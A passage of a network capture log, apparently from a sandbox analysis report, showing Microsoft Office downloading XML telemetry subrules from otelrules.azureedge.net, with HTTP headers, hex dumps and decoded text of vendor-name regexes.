                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    45192.168.2.64975113.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:19 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:20 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:19 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 491
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582B98B88612"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 715419d5-801e-0078-38c7-45bac6000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010019Z-1746fd949bd7wvgbhC1EWR0rgs00000000gg000000002v1r
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:20 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    46192.168.2.64975213.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:20 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:23 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:22 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 416
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BAEA4B445"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 0e2e5981-501e-0035-17c1-45c923000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010022Z-1746fd949bd9x4mhhC1EWRb76n00000000n0000000001xsg
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:23 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    47192.168.2.64975313.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:20 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:21 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:21 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 479
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582B989EE75B"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: c73ff22a-601e-0097-54c1-45f33a000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010021Z-1746fd949bdmv56chC1EWRypnn00000000g000000000ack7
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:21 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    48192.168.2.64975413.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:21 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:21 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:21 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 415
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 9b021dfd-501e-0047-60c1-45ce6c000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010021Z-1746fd949bddgsvjhC1EWRum2c00000000n000000000rz4y
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:21 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    49192.168.2.64975513.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:21 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:21 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:21 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 471
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582B97E6FCDD"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 4c860516-801e-00a3-3252-437cfb000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010021Z-174f784596886s2bhC1EWR743w00000016rg00000000ch69
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:21 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    50192.168.2.64975713.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:23 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:23 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:23 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 477
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BA54DCC28"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 3f63c6b9-401e-0064-499d-4354af000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010023Z-174f7845968ljs8phC1EWRe6en00000016kg00000000asen
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:23 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    51192.168.2.64975613.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:23 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:24 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:23 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 419
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582B9C710B28"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 686307fb-901e-0029-3dcc-45274a000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010023Z-1746fd949bdwt8wrhC1EWRu6rg00000000s0000000000fvx
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:24 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    52192.168.2.64975813.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:23 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:24 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:23 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 419
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BB7F164C3"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 2fc5819c-d01e-002b-4a95-4325fb000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010023Z-174f78459684bddphC1EWRbht400000016a000000000t46k
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:24 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    53192.168.2.64975913.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:23 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:24 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:23 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 477
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BA48B5BDD"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 62698de6-501e-00a3-0df8-44c0f2000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010023Z-174f7845968jrjrxhC1EWRmmrs00000016ug00000000c9nf
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
